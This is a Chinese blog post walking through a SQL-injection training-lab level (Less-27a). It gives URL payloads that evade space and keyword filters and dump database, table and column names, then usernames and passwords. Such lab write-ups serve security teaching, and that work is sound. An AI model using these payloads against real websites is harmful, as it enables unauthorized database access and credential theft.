Less（27a）GET - 走看看

zoukankan html css js c++ java

Less（27a）GET

1.和Less（27）一样，就是把单引号闭合变成双引号闭合

　　验证一下：?id=0"%0bor(1)=(1)%26%26%0b"1

　　

2.爆破：

　　（1）爆库： ?id=0"%0buniOn%0bsElEct%0b1,database(),3%0bor%0b"1"="1

　　　　

　　（2）爆表：?id=0"%0buniOn%0bsElEct%0b1,(group_concat(table_name)),3%0bfrom%0binformation_schema.tables%0bwhere%0btable_schema='security'%0b%26%26%0b"1"="1

　　　　

　　（3）爆列名：?id=0"%0buniOn%0bsElEct%0b1,(group_concat(column_name)),3%0bfrom%0binformation_schema.columns%0bwhere%0btable_schema='security'%0bAnd%0btable_name='users'%0b%26%26%0b"1"="1

　　　　

　　（4）爆值：?id=0"%0buniOn%0bsElEct%0b1,(group_concat(username,0x7e,password)),3%0bfrom%0busers%0buniOn%0bseLect (1),(2),"(3

　　　　

查看全文

相关阅读:
Mysql的四种引擎介绍
 电商项目实战（架构三）——redis的启动，安装和运用（windows下）
bug篇——ERROR: Maven JVM terminated unexpectedly with exit code 137
电商项目实战（架构二）——Swagger-UI实现在线api文档
 电商项目实战（架构一）——SpringBoot+MyBatis搭建基本骨架
 bug篇——上传图片大小限制配置
 bug篇——Mybatis中Mapper.xml文件的if判断问题
 bug篇——线上移动端跳转页面
 安装篇——xshell评估过期解决
 bug篇——vue跨域时cookies问题

原文地址：https://www.cnblogs.com/meng-yu37/p/12403017.html

Copyright © 2011-2022 走看看